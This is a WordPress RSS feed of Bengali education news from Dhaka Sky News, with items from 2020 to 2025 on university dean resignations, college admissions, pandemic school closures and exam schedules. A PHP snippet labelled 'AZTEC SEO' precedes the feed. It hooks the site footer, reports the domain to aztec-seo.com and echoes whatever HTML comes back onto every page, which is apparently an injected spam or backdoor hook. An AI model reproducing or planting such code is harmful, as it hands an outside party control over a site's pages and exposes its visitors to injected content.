/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); শিক্ষা – Dhaka Sky News https://www.dhakaskynews.com Dhaka Sky News Sun, 21 Dec 2025 19:36:40 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.9 আন্দোলনের মুখে রাবির ৬ আওয়ামীপন্থী ডিনের পদত্যাগ https://www.dhakaskynews.com/uncategorized/2025/12/22/News_ID-5569/ https://www.dhakaskynews.com/uncategorized/2025/12/22/News_ID-5569/#respond Sun, 21 Dec 2025 19:31:49 +0000 https://www.dhakaskynews.com/?p=5569 আন্দোলনের মুখে অবশেষে পদত্যাগ করলেন রাজশাহী বিশ্ববিদ্যালয়ের (রাবি) আওয়ামী লীগপন্থি ছয় ডিন। পদত্যাগ দাবিতে উপাচার্য, উপ-উপাচার্য, প্রক্টর, রেজিস্ট্রারসহ প্রশাসন ভবনে সব দপ্তরে তালা লাগানোসহ দিনভর নানা ঘটনার পর দায়িত্ব থেকে সরে দাঁড়ালেন তারা।
রোববার (২১ ডিসেম্বর) রাতে বিশ্ববিদ্যালয়ের রেজিস্ট্রার অধ্যাপক ইফতিখারুল আলম মাসুদ এ তথ্য নিশ্চিত করেছেন।
এর আগে দুপুর ১টায় তাদের পদত্যাগ দাবিতে এসব কার্যালয়ে তালা ঝুলিয়ে দেন একদল শিক্ষার্থী। এ নিয়ে উপ-উপাচার্য অধ্যাপক ফরিদ উদ্দিনের সঙ্গে শিক্ষার্থী ও ছাত্রশিবির নেতাদের বাগবিতণ্ডা হয়। এর আগে কলা, সামাজিক বিজ্ঞান ও আইন অনুষদের ডিনদের কার্যালয়েও তালা ঝুলিয়ে দেন শিক্ষার্থীরা। পরে বেলা সাড়ে ৩টার দিকে প্রশাসনের ঊর্ধ্বতন কর্মকর্তাদের সঙ্গে আলোচনায় বসেন শিক্ষার্থীরা। সেখানে ডিনদের অপসারণের আশ্বাস দেওয়া হলে তালা খুলে দেওয়া হয়। এ নিয়ে সন্ধ্যা ৭টায় জরুরি বৈঠকে বসেন উপাচার্য। বৈঠকের পর তার ও উপ-উপাচার্যের মত জানার চেষ্টা করেও পাওয়া যায়নি।
তবে এক ডিন যুগান্তরকে বলেন, ‘ভিসি আমাদের ডেকেছিলেন। আমরা আগেও মৌখিকভাবে দায়িত্ব না দেওয়ার কথা বলেছিলাম। আজ লিখিতভাবে দায়িত্ব পালনে অপারগতার কথা জানিয়ে এসেছি।’
পরে বিশ্ববিদ্যালয়ের জনসংযোগ দপ্তরও তাদের পদত্যাগের বিষয়টি যুগান্তরকে নিশ্চিত করে।
১৮ ডিসেম্বর এসব ডিনদের মেয়াদ শেষ হয়েছে। তবে তাদের মেয়াদ বাড়ান উপাচার্য। এর পরিপ্রেক্ষিতে আওয়ামীপন্থি ছয়জনের পদত্যাগ দাবিতে আলটিমেটাম দেন রাকসুর জিএস সালাহউদ্দিন আম্মার। এই দাবি আরও জোরদার হয় জুলাই যোদ্ধা শরীফ ওসমান হাদির মৃত্যুর পরে। গত কয়েক দিনের প্রতিবাদ সমাবেশ থেকে আওয়ামীপন্থি শিক্ষকদের শাস্তির দাবিতে আলটিমেটাম দেওয়া হয়। সেই মোতাবেক রোববার দুপুর ১টার দিকে তিন ডিনের কার্যালয়ে তালা দেওয়া হয় এবং সাবেক উপাচার্য অধ্যাপক গোলাম সাব্বির সাত্তার ক্লাশ নিচ্ছেন জানতে পেরে তার বিভাগেও যান তারা। পরে আওয়ামীপন্থি ডিন ও শিক্ষকদের অপসারণের দাবিতে প্রশাসন ভবনের উপাচার্য, উপ-উপাচার্যসহ একাধিক ঊর্ধ্বতন কর্মকর্তাদের কার্যালয়ে তালা দেন রাকসু প্রতিনিধি ও একদল শিক্ষার্থী। সেখানে উপস্থিত হন শাখা ছাত্রশিবিরের নেতাকর্মীরা।
এ সময় উপ-উপাচার্য অধ্যাপক ফরিদ উদ্দিন খানের সঙ্গে বাগবিতণ্ডা হয়। পরে বিকাল সাড়ে ৪টা পর্যন্ত প্রশাসন ভবনে উপাচার্যের সম্মেলন কক্ষে তাদের সঙ্গে ঊর্ধ্বতন কর্মকর্তাদের আলোচনা চলে। এতে তাদের সন্ধ্যা সাড়ে ৬টায় জরুরি সভায় বসে সিদ্ধান্ত জানানোর আশ্বাস দেওয়া হয়।
কার্যালয়ে তালা দেওয়া ডিনরা হলেন- আইন অনুষদের অধ্যাপক আবু নাসের মো. ওয়াহিদ, ব্যবসায় শিক্ষা অনুষদের অধ্যাপক এএসএম কামরুজ্জামান এবং সামাজিক বিজ্ঞান অনুষদের অধ্যাপক এসএম এক্রাম উল্যাহ।
অন্য তিন ডিন হলেন- বিজ্ঞান অনুষদের নাসিমা আখতার, প্রকৌশল অনুষদের বিমল কুমার প্রামাণিক এবং ভূবিজ্ঞান অনুষদের এএইচএম সেলিম রেজা।
কর্মসূচিতে রাকসুর জিএস সালাহউদ্দিন আম্মার, সিনেট সদস্য আকিল বিন তালেব, রাকসুর সংস্কৃতি বিষয়ক সম্পাদক জায়িদ হাসান জোহা, মিডিয়া ও প্রকাশনা সম্পাদক ইসলাম, সহসাংস্কৃতিক সম্পাদক রাকিবুল হাসান, ইসলামী ছাত্রশিবিরের সেক্রেটারি মুজাহিদ ফয়সাল, বিশ্ববিদ্যালয় শাখা ছাত্রপক্ষের আহ্বায়ক গোলাম মোস্তফা প্রমুখ উপস্থিত ছিলেন।
এদিকে সকালে ছয় অনুষদের আওয়ামীপন্থি ডিনদের পদত্যাগের দাবিতে সালাহউদ্দিন আম্মার রাকসু ভবনের সামনে অবস্থান নেন। ছয় ডিনের কেউ ক্যাম্পাসে না থাকায় গণমাধ্যমকর্মীদের সামনে একে একে তাদের সবাইকে কল করেন তিনি। একই সঙ্গে তাদের উদ্দেশে লেখা পদত্যাগপত্রও প্রকাশ করেন।
পরে দুপুরে সালাহউদ্দিন আম্মার এক ফেসবুক পোস্টে লিখেছেন- ‘আজ মোটামুটি সব দপ্তরে আওয়ামীপন্থিদের দপ্তরগুলো তালাবদ্ধ। আমিও এটাই চাই, বিচার না হওয়া পর্যন্ত তালাবদ্ধ থাকুক। সঙ্গে সঙ্গে একটা তালিকা করেছি বিগত জুলাইয়ে বিভিন্ন সময়ে শিক্ষার্থীদের বিপক্ষে অবস্থান করা শিক্ষকদের।’
এ বিষয়ে তখন সামাজিক বিজ্ঞান অনুষদের ডিন অধ্যাপক এসএম এক্রাম উল্যাহ বলেন, আমি এ পরিস্থিতিতে ডিন থাকতে চাচ্ছি না। উপাচার্যের কাছে দায়িত্ব হস্তান্তর করেছি। উপাচার্য যে সিদ্ধান্ত নেবেন, সেটাই হবে।
বিকালে উপ-উপাচার্য (শিক্ষা) অধ্যাপক মোহা. মাঈন উদ্দিন বলেন, ‘এসব বিষয়ে আমাদের ইতোমধ্যে আলোচনা হয়েছে। আমরা এ বিষয়টি (অপসারণ) নিয়ে আগেও চিন্তাভাবনা করেছি। দাবির পরিপ্রেক্ষিতে আমাদের সিদ্ধান্ত নেওয়াই হয়েছে। আজকে সন্ধ্যায় উপাচার্যের সভায়, না হয় আগামীকাল সিদ্ধান্তটি অফিশিয়ালি জানানো হবে।’

]]>
https://www.dhakaskynews.com/uncategorized/2025/12/22/News_ID-5569/feed/ 0
আর্থ-সামাজিক উন্নয়নে কারিগরী শিক্ষার বিকল্প নেই : হাফিজুর রহমান https://www.dhakaskynews.com/bangladesh/2023/06/17/News_ID-5035/ https://www.dhakaskynews.com/bangladesh/2023/06/17/News_ID-5035/#respond Sat, 17 Jun 2023 14:39:29 +0000 https://www.dhakaskynews.com/?p=5035 পটুয়াখালী জেলা পরিষদের চেয়ারম্যান আলহাজ অ্যাডভোকেট মোঃ হাফিজুর রহমান বলেছেন, আর্থ-সামাজিক উন্নয়নে কারিগরী শিক্ষার বিকল্প নেই। তাই বর্তমান সরকারের প্রধানমন্ত্রী শেখ হাসিনা কারিগরী শিক্ষাকে গুরুত্ব দিয়ে বাজেটে হাজার হাজার কোটি টাকা বরাদ্দ দিয়েছেন। আমাদের সন্তানদেরকে কারিগরী শিক্ষা গ্রহণে উদ্বুদ্ধ করতে হবে।

তিনি বলেন, সরকার উপজেলা পর্যায়ে কারিগরী শিক্ষা প্রতিষ্ঠান গড়ে তোলার প্রজেক্ট গ্রহণ করেছেন। যাতে গ্রামের ছেলে-মেয়েরা সহজে কারিগরি শিক্ষা গ্রহণ করে দক্ষ নাগিরিক হতে পারে। এ শিক্ষা যতো প্রসার হবে, ব্যক্তি জীবনের পাশাপাশি সমাজ ও দেশ ততো উন্নত হবে।

১৭ জুুন শনিবার সকাল ১০টায় “একটাই লক্ষ্য-হতে হবে দক্ষ” এ শ্লোগান নিয়ে কারিগরি শিক্ষার জনপ্রিয়তা বৃদ্ধি ও প্রচারণাসহ শিক্ষার্থীদের মেধা ও উদ্ভাবনী শক্তির বিকাশের লক্ষ্যে পটুয়াখালী সরকারী টেকনিক্যাল স্কুল ও কলেজে উদ্ভাবনী প্রতিযোগীতা-২০২৩ অনুষ্ঠানে প্রধান অতিথির বক্তব্যে তিনি এ কথা বলেন।

পটুয়াখালী সরকারী টেকনিক্যাল স্কুল ও কলেজের অধ্যক্ষ প্রকৌশলী আবদুল জব্বারের সভাপতিত্বে ও ইন্সঃ (পদার্থ) জসিম উদ্দিনের উপস্থাপনায় অনুষ্ঠানে বিশেষ অতিথির বক্তব্য রাখেন মেয়র মহিউদ্দিন আহমেদ।

এ সময় আরো উপস্থিত ছিলেন এসেট প্রজেক্টের ডেপুটি প্রজেক্ট ডিরেক্টর বিএম শরিফুল ইসলাম। কলেজের ইন্সঃ (গণিত) মাহবুব আলম, ইন্সঃ (গণিত) আবু সাইদ, ইন্সঃ (ওয়েলডিং) আবু বকর সিদ্দিক, ইন্সঃ (পদার্থ) প্রিয়াংকা সরকার, জুনিয়র ইন্সঃ (ইলেকট্রিক) জাফর হোসেনসহ শিক্ষার্থীরা।

উদ্ভাবনী প্রতিযোগিতায় বিভিন্ন ট্রেডের ১৫টি স্টলে নিজেরদের তৈরি যন্ত্রপাতির মাধ্যমে সহজ পন্থায় সোলার বিদ্যুৎ, পানি সেচ, পরিবেশ, ফরমালিনমুক্ত মাছ সংরক্ষণ, পরিবেশ রক্ষাসহ বিভিন্ন বিষয় উদ্ভাবন করেন শিক্ষার্থীরা।

]]>
https://www.dhakaskynews.com/bangladesh/2023/06/17/News_ID-5035/feed/ 0
কলেজে ভর্তির সুযোগ পেল ১২ লাখ ৭৮ হাজার শিক্ষার্থী https://www.dhakaskynews.com/bangladesh/2023/01/01/News_ID-3342/ https://www.dhakaskynews.com/bangladesh/2023/01/01/News_ID-3342/#respond Sat, 31 Dec 2022 19:51:44 +0000 https://www.dhakaskynews.com/?p=3342 একাদশ শ্রেণিতে ভর্তির আবেদনের প্রথম ধাপের ফল ৩১ ডিসেম্বর শনিবার সন্ধ্যায় প্রকাশ করা হয়েছে। এই ধাপে ১৩ লাখ ৫৭ হাজার ৬৪৬ জন আবেদন করেছিল। তাদের মধ্যে ভর্তির জন্য মনোনীত হয়েছে ১২ লাখ ৭৮ হাজার ১১৪ জন। আবেদন করেও ৭৯ হাজার ৫৩২ জন পছন্দের কলেজে ভর্তির জন্য মনোনীত হয়নি।

ভর্তির সুযোগ বঞ্চিতদের মধ্যে ২৩ হাজার ২৩১ জনই জিপিএ-৫ পাওয়া শিক্ষার্থী। অনলাইনে নির্ধারিত ওয়েবসাইটে প্রবেশ করে প্রথম ধাপের এ ফল জানা যাচ্ছে।

ঢাকা শিক্ষা বোর্ডের চেয়ারম্যান অধ্যাপক তপন কুমার সরকার গণমাধ্যমকে জানান, জিপিএ-৫ পেয়েও কলেজ না পাওয়ার একমাত্র কারণ হচ্ছে কলেজ পছন্দে সঠিক সিদ্ধান্ত না নেওয়া। ছাত্রছাত্রীদেরকে তাদের প্রাপ্ত নম্বর অনুযায়ী কলেজ বণ্টন করা হয়েছে, জিপিএ-৫ অনুযায়ী নয়। তাই যারা প্রাপ্ত নম্বরের দিকে না তাকিয়ে বড় কলেজ পছন্দ দিয়েছে এবং তাদের মধ্যে যাদের প্রাপ্ত নম্বর কম তারা ছিটকে পড়েছে। এখন ভবিষ্যতেও একই ভুল করলে তারা কলেজ পাবে না। তাই ভেবেচিন্তে আবেদনে কলেজ পছন্দ দিতে হবে।

এবছর এসএসসি ও সমমানের পরীক্ষায় পাস করেছে ১৭ লাখ ৪৩ হাজার ৬১৯ জন। এই হিসাবে ৩ লাখ ৮৫ হাজার ৯৭৩ জন আবেদন করেনি। তবে এসব শিক্ষার্থীর অনেকে কারিগরি শিক্ষা বোর্ডের অধীনে ডিপ্লোমা কোর্সে আবেদন করে থাকতে পারে। ওই বোর্ড এবারও বিভিন্ন পলিটেকনিক ও মনোটেকনিক ইনস্টিটিউটে ভর্তির জন্য আলাদা আবেদন নিচ্ছে।

এবারও কলেজ-মাদ্রাসায় ভর্তির লক্ষ্যে মোট তিন ধাপে আবেদন নেওয়া হবে। প্রথম ধাপে ১৮ জানুয়ারি পর্যন্ত আবেদন গ্রহণ করা হয়। দ্বিতীয় ধাপের আবেদন নেওয়া হবে ৯-১০ জানুয়ারি। আর তৃতীয় ধাপের আবেদন ১৬ জানুয়ারি নেওয়া হবে। প্রথম ধাপের শিক্ষার্থীরা সর্বনিম্ন ৫টি ও সর্বোচ্চ ১০টি কলেজ পছন্দের তালিকায় দিতে পেরেছে। এই প্রক্রিয়ায় ১৩ লক্ষাধিক শিক্ষার্থীর ৭০ লাখ ২০ হাজারের বেশি আসন ‘চয়েজ’ দিয়েছে।

]]>
https://www.dhakaskynews.com/bangladesh/2023/01/01/News_ID-3342/feed/ 0
জাতীয় বিশ্ববিদ্যালয়ের মঙ্গলবারের সব পরীক্ষা স্থগিত https://www.dhakaskynews.com/bangladesh/2022/10/24/News_ID-3106/ https://www.dhakaskynews.com/bangladesh/2022/10/24/News_ID-3106/#respond Mon, 24 Oct 2022 08:57:49 +0000 https://www.dhakaskynews.com/?p=3106 ঘূর্ণিঝড় সিত্রাংয়ের কারণে জাতীয় বিশ্ববিদ্যালয়ের অধীনে অনুষ্ঠিতব্য মঙ্গলবারের সব পরীক্ষা স্থগিত করা হয়েছে।

জাতীয় বিশ্ববিদ্যালয়ের জনসংযোগ দপ্তরের পরিচালক মো. আতাউর রহমানের সই করা সংবাদ বিজ্ঞপ্তিতে সোমবার এ তথ্য জানানো হয়েছে।

স্থগিত পরীক্ষার সংশোধিত সময়সূচি সংশ্লিষ্ট সবাইকে পরে জানানো হবে। এছাড়া এসব পরীক্ষার পূর্বঘোষিত অন্যান্য তারিখ ও সময়সূচি অপরিবর্তিত থাকবে বলে বিজ্ঞপ্তিতে বলা হয়।

]]>
https://www.dhakaskynews.com/bangladesh/2022/10/24/News_ID-3106/feed/ 0
ঢাকা বিশ্ববিদ্যালয়ে ছাত্রদলের বিক্ষোভ https://www.dhakaskynews.com/bangladesh/2022/07/18/News_ID-3085/ https://www.dhakaskynews.com/bangladesh/2022/07/18/News_ID-3085/#respond Mon, 18 Jul 2022 10:06:02 +0000 https://www.dhakaskynews.com/?p=3085 প্রবাসে থাকা বিএনপির ভারপ্রাপ্ত চেয়ারম্যান তারেক রহমানকে নিয়ে ঢাকা মহানগর দক্ষিণ আওয়ামী লীগ নেতা আবু আহমেদ মান্নাফীর ধৃষ্টতাপূর্ণ বক্তব্যের প্রতিবাদে বিক্ষোভ মিছিল করেছে ঢাকা বিশ্ববিদ্যালয় ছাত্রদল।

আজ সোমবার সাড়ে ৯টায় মিছিলটি কেন্দ্রীয় শহিদ মিনার সংলগ্ন ঢাকা মেডিকেলের বহির্বিভাগের গেটে শুরু হয়ে কেন্দ্রীয় শহিদ মিনার এলাকা প্রদক্ষিণ করে বকশিবাজার মোড়ে এসে শেষ হয়।

ঢাকা বিশ্ববিদ্যালয় ছাত্রদলের আহ্বায়ক আক্তার হোসেনের নেতৃত্বে মিছিলে আরও উপস্থিত ছিলেন সদস্য সচিব আমান উল্লাহ আমান, যুগ্ম আহবায়ক নাসির উদ্দিন, জহির উদ্দিন আহমেদ, এইচ এম আবু জাফর প্রমুখ।

]]>
https://www.dhakaskynews.com/bangladesh/2022/07/18/News_ID-3085/feed/ 0
শিক্ষাপ্রতিষ্ঠানে আবার ছুটি বাড়ল https://www.dhakaskynews.com/education/2021/05/26/News_ID-2731/ https://www.dhakaskynews.com/education/2021/05/26/News_ID-2731/#respond Wed, 26 May 2021 07:21:08 +0000 https://www.dhakaskynews.com/?p=2731 দেশে মহামরি করোনাভাইরাস প্রাদুর্ভাবের কারণে শিক্ষাপ্রতিষ্ঠানের চলমান ছুটি আগামী ১২ জুন পর্যন্ত বাড়ানো হয়েছে। শিক্ষামন্ত্রী দীপু মনি আজ বুধবার দুপুরে ভার্চুয়াল সংবাদ সম্মেলনে এ তথ্য জানান ।

এ মহামারি ভাইরাসের সংক্রমণ এড়াতে দেশের সব শিক্ষাপ্রতিষ্ঠান ১৪ মাসের বেশি সময় ধরে বন্ধ রয়েছে। চলতি বছরের মার্চের শেষ দিকে দেশে শুরু হয়েছে করোনার দ্বিতীয় ঢেউ। এতে সংক্রমণ ও মৃত্যু বৃদ্ধি পেয়েছে। এমতাবস্থায় এপ্রিল থেকে দেশে লকডাউন চলছে। যদিও সম্প্রতি লকডাউন শিথিল করা হয়েছে।

সরকারি পূর্ব ঘোষণা অনুযায়ী শিক্ষাপ্রতিষ্ঠানের ছুটি শেষ হচ্ছে ২৯ মে। এর মধ্যেই শিক্ষাপ্রতিষ্ঠানের ছুটি আরও বাড়ানোর সিদ্ধান্তের কথা জানালেন মন্ত্রী।

চীনের উহানে ২০১৯ সালের শেষের দিকে প্রথম এ ভাইরাস দেখা দেয়। পরে তা বিশ্বব্যাপী ছড়িয়ে পড়ে। বাংলাদেশে প্রথম করোনা শনাক্ত হয় গত বছরের ৮ মার্চ। এর ১০ দিন পর প্রথম মৃত্যু হয় কোভিডে। করোনা পরিস্থিতির কারণে গত বছরের ১৭ মার্চ থেকে সব শিক্ষা প্রতিষ্ঠান বন্ধ রয়েছে।

২৩ মে থেকে স্কুল-কলেজ এবং ২৪ মে থেকে বিশ্ববিদ্যালয় খোলার ঘোষণা দেওয়া হলেও কোভিড-১৯ এর প্রাদুর্ভাব বিস্তার অব্যাহত থাকায় ছুটি কয়েক দফা বাড়ানোর ঘোষণা দেয় সরকার।

]]>
https://www.dhakaskynews.com/education/2021/05/26/News_ID-2731/feed/ 0
দশম ও দ্বাদশ শ্রেণিতে নিয়মিত ক্লাস হবে, বাকিদের সপ্তাহে এক দিন https://www.dhakaskynews.com/bangladesh/2021/01/25/News_ID-1752/ https://www.dhakaskynews.com/bangladesh/2021/01/25/News_ID-1752/#respond Sun, 24 Jan 2021 18:45:35 +0000 https://www.dhakaskynews.com/?p=1752 মহামারী করোনাভাইরাস প্রাদুর্ভাবের কারণে দীর্ঘদিন বন্ধ থাকার পর খুলছে দেশের শিক্ষাপ্রতিষ্ঠান। দশম ও দ্বাদশ শ্রেণির শিক্ষার্থীদের নিয়মিত শিক্ষাপ্রতিষ্ঠানে গিয়ে ক্লাস শুরু হচ্ছে শিগগিরই। বাকিদের আপাতত সপ্তাহে একদিন করে স্কুলে গিয়ে ক্লাস করতে হবে। শিক্ষামন্ত্রী ডা. দীপু মনি এই তথ্য জানিয়েছেন। রোববার জাতীয় সংসদে পরীক্ষা ছাড়াই উচ্চমাধ্যমিক ও সমমানের পরীক্ষার ফল প্রকাশের বিল পাস হওয়ার পর দেওয়া বক্তৃতায় শিক্ষামন্ত্রী বলেন, শিক্ষাপ্রতিষ্ঠান খোলার পর এখন শুধু দশম ও দ্বাদশ শ্রেণির শিক্ষার্থীদের নিয়মিত ক্লাস হবে। বাকিরা সপ্তাহে একদিন করে স্কুলে গিয়ে ক্লাস করবে।

শিক্ষামন্ত্রী ডা. দীপু মনি বলেন, ৪ ফেব্রুয়ারির মধ্যে শিক্ষাপ্রতিষ্ঠান খোলার প্রস্তুতি নেওয়ার নির্দেশ দেওয়া হয়েছে। প্রাথমিকভাবে শিক্ষাপ্রতিষ্ঠান খোলার পর দশম ও দ্বাদশ শ্রেণির নিয়মিত ক্লাস হবে। অন্য শ্রেণির শিক্ষার্থীরা সপ্তাহে একদিন করে ক্লাসে আসবে। পুরো সপ্তাহের পড়া নিয়ে যাবে। পরের সপ্তাহে আবার একদিন আসবে। শিক্ষার্থীর সংখ্যা অনেক, শ্রেণিকক্ষে তাদের গাদাগাদি করে বসতে হয়। স্বাস্থ্যবিধি মেনে বসানো সম্ভব হয় না। তাই সব শ্রেণির শিক্ষার্থীকে একসঙ্গে না এনে আলাদা আলাদা দিন ক্লাসে আনার ব্যবস্থা হবে।

শিক্ষামন্ত্রী বলেন, তারা নিয়মিত করোনার সংক্রমণ পরিস্থিতি বিশ্লেষণ করছেন। জাতীয় পরামর্শক কমিটির সঙ্গে আলোচনা করে সিদ্ধান্ত নেওয়া হবে। এ বছর যারা এসএসসি ও এইচএসসি পরীক্ষার্থী, তারা এক বছর সরাসরি ক্লাস করতে পারেনি। অনলাইন ও টিভিতে অনেকে ক্লাস করেছে। কিছু শিক্ষার্থী একেবারেই ক্লাস করেনি। এ বছরের জন্য সংক্ষিপ্ত সিলেবাস করা হয়েছে। ফেব্রুয়ারিতে যদি শিক্ষাপ্রতিষ্ঠান খুলে দেওয়া যায়, তা হলে পরে কয়েক মাস সংক্ষিপ্ত সিলেবাসের ওপর পাঠদান শেষে পরীক্ষা নেওয়া যাবে।

মহামারী করোনাভাইরাস প্রাদুর্ভাবের মধ্যে মাধ্যমিক স্তরের শিক্ষাপ্রতিষ্ঠানগুলো খোলার প্রস্তুতি নিতে ইতিমধ্যে প্রতিষ্ঠান প্রধানদের নির্দেশ দিয়েছে সরকার। গত ২৩ জানুয়ারি মাধ্যমিক ও উচ্চশিক্ষা অধিদফতর (মাউশি) স্কুল-কলেজের অধ্যক্ষদের কাছে পাঠানো এক চিঠিতে ওই নির্দেশনা দেওয়া হয়।

দেশে প্রথম করোনাভাইরাস দেখা দেয় গত বছরের ৮ মার্চ। এর ১০ দিন পর প্রথম মৃত্যু হয় দেশে। গত বছর ১৭ মার্চ থেকে দেশের সব শিক্ষাপ্রতিষ্ঠান বন্ধ আছে। কওমি মাদ্রাসা বাদে অন্য সব শিক্ষাপ্রতিষ্ঠানে আগামী ৩০ জানুয়ারি পর্যন্ত ছুটি ঘোষণা করা আছে। ৩০ জানুয়ারি পর্যন্ত শিক্ষাপ্রতিষ্ঠানে ছুটির ঘোষণা আছে। সরকার গত ২৯ মার্চ থেকে মাধ্যমিকের এবং ৭ এপ্রিল থেকে প্রাথমিকের রেকর্ড করা ক্লাস সংসদ টেলিভিশনে প্রচার করছে।

]]>
https://www.dhakaskynews.com/bangladesh/2021/01/25/News_ID-1752/feed/ 0
ফেব্রুয়ারিতেই খুলছে শিক্ষাপ্রতিষ্ঠান https://www.dhakaskynews.com/bangladesh/2020/12/29/News_ID-1461/ https://www.dhakaskynews.com/bangladesh/2020/12/29/News_ID-1461/#respond Tue, 29 Dec 2020 11:44:20 +0000 https://www.dhakaskynews.com/?p=1461 চলমান করোনা পরিস্থিতির কথা মাথায় রেখেই আগামী ফেব্রুয়ারি মাস থেকে সীমিত আকারে শিক্ষাপ্রতিষ্ঠান খুলে দেয়ার সিদ্ধান্ত নিয়েছে সরকার।

মঙ্গলবার ভার্চুয়াল এক সংবাদ সম্মেলনে শিক্ষামন্ত্রী দীপু মনি একথা জানান। তিনি বলেন, আগামী বছরের এসএসসি/সমমান এবং এইচএসসি/সমমান পরীক্ষার্থীদের প্রস্তুতির জন্য সীমিত আকারে শিক্ষাপ্রতিষ্ঠান খোলার প্রস্তুতি নেওয়া হয়েছে। শিক্ষার্থীদের ক্লাসরুমে বসিয়ে অসমাপ্ত সিলেবাস শেষ করে একটি প্রস্তুতিমূলক পরীক্ষা নেয়া হবে। যার মাধ্যমে এ দুই স্তরের পরীক্ষার্থীদের পাবলিক পরীক্ষায় অংশগ্রহণের জন্য প্রস্তুত করা হবে।

তিনি আরও বলেন, ‌পরিস্থিতি অনুকূলে থাকলে আগামী বছরের জুনে এসএসসি ও সমমান পরীক্ষা নেয়া হবে। এরপর জুলাই-আগস্টে এইচএসসি পরীক্ষার প্রস্তুতি নেয়া হবে। তবে করোনা পরিস্থিরি কারণে দীর্ঘদিন শিক্ষাপ্রতিষ্ঠান বন্ধ থাকায় আগামী বছরের এসএসসি ও এইচএসসি পরীক্ষার্থীদের সিলেবাস সংক্ষিপ্ত করে দেয়া হবে।

উল্লেখ্য, স্বাভাবিক সময় এসএসসি পরীক্ষা ফেব্রুয়ারিতে এবং এইচএসসি পরীক্ষা এপ্রিলে অনুষ্ঠিত হয়ে থাকে। তবে করোনার পরিস্থির মধ্যে ২০২১ সালের এসএসসি-এইচএসসি পরীক্ষা কবে হবে, তা নিয়ে শিক্ষক-শিক্ষার্থী ও অভিভাবকসহ সংশ্লিষ্টদের মনে প্রশ্ন ছিল। সবশেষ করোনা পরিস্থিতি বিবেচনায় পরীক্ষা পেছানোর বিষয়ে আজ চুড়ান্ত সিদ্ধান্ত দিয়েছেন শিক্ষামন্ত্রী।

]]>
https://www.dhakaskynews.com/bangladesh/2020/12/29/News_ID-1461/feed/ 0
একাদশ শ্রেণিতে ভর্তি ৯ আগস্ট শুরু https://www.dhakaskynews.com/bangladesh/2020/07/20/News_ID-841/ https://www.dhakaskynews.com/bangladesh/2020/07/20/News_ID-841/#respond Sun, 19 Jul 2020 19:06:02 +0000 https://www.dhakaskynews.com/?p=841 আগামী ৯ আগস্ট থেকে কলেজগুলোতে ২০২০-২০২১ শিক্ষাবর্ষে একাদশ শ্রেণিতে অনলাইন ভর্তির কার্যক্রম শুরু হচ্ছে। ভর্তি কার্যক্রম চলবে আগামী ১৫ সেপ্টেম্বর পর্যন্ত।

রোববার শিক্ষামন্ত্রী ডা. দীপু মনির সভাপতিত্বে এক অনলাইন সভায় এই সিদ্ধান্ত হয়।

ভর্তির যাবতীয় তথ্য শিক্ষা বোর্ডগুলোর ওয়েবসাইটে প্রকাশ করা হবে।

দেশে করোনাভাইরাসের প্রকোপ বাড়তে থাকায় গত ১৭ মার্চ থেকে সব শিক্ষাপ্রতিষ্ঠান বন্ধ রয়েছে।

মে মাসে মাধ্যমিকের ফল ঘোষণা হলে ৬ জুন থেকে একাদশ শ্রেণিতে ভর্তি শুরুর পরিকল্পনার কথা জানিয়েছিলেন ঢাকা শিক্ষা বোর্ডের কলেজ পরিদর্শক অধ্যাপক হারুন-আর-রশিদ। এরপর ৩১ মে এসএসসি ও সমমানের পরীক্ষার ফল দেওয়া হলেও মহামারী পরিস্থিতির উন্নতি না হওয়ায় একাদশে ভর্তি পিছিয়ে যায়।

এ বছর সারাদেশে এসএসসি ও সমমানের পরীক্ষায় গড় পাসের হার ৮২ দশমিক ৮৭ শতাংশ, যা গতবছর ছিল ৮২ দশমিক ২০ শতাংশ। এ বছর মোট জিপিএ-৫ পেয়েছে ১ লাখ ৩৫ হাজার ৮৯৮ জন, যা গত বছর পেয়েছিল ১ লাখ ৫ হাজার ৫৯৪ জন।

ফলাফলে দেখা গেছে, এবার এসএসসি-সমমান পরীক্ষায় ২০ লাখ ৪০ হাজার ২৮ জন শিক্ষার্থী পরীক্ষায় অংশ নেয়। তাদের মধ্যে ১৬ লাখ ৯০ হাজার ৫২৩ জন পাস করেছে।বাংলাদেশ শিক্ষাতথ্য ও পরিসংখ্যান ব্যুরোর (ব্যানবেইস) তথ্যমতে, সারাদেশে উচ্চ মাধ্যমিকে সাধারণ, মাদ্রাসা ও কারিগরি মিলিয়ে মোট ১৮ লাখ ৪৬ হাজার ৭৬৫টি আসন রয়েছে। এর মধ্যে সাধারণ শাখায় রয়েছে প্রায় ১৩ লাখ। মাদ্রাসায় রয়েছে এক লাখ আট হাজার।

ব্যানবেইসের হিসাবে, আসন অনেক খালি থেকে যাবে। আর ঢাকা শিক্ষাবোর্ডের হিসাব মতে, সারাদেশের সব কলেজ, কারিগরি ও মাদ্রাসা মিলিয়ে প্রায় সাড়ে চার হাজার শিক্ষা প্রতিষ্ঠানে একাদশ শ্রেণিতে মোট আসন সংখ্যা ১৯ লাখ ৬৬ হাজার। আর এবার পাস করেছে মোট ১৬ লাখ ৯০ হাজার ৫২৩ জন। সে হিসেবে উচ্চ মাধ্যমিকে আসন ফাঁকা থাকবে দুই লাখ ৭৫ হাজার ৫৭৭টি।

]]>
https://www.dhakaskynews.com/bangladesh/2020/07/20/News_ID-841/feed/ 0
